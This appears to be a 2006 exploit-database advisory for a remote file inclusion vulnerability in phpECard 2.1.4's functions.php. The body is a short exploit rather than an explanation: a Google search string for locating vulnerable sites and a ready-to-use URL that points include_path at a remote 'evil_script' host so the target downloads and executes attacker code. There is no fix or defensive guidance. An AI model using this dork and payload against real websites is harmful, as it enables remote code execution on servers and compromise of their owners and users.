id: 760
date: 08/28/2006
title: phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability
author: LeAk
cves: 

===================================================================
phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability
===================================================================


#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
# Turkis Hackers
==================================================================================================



#  0day.today [2023-03-22]  #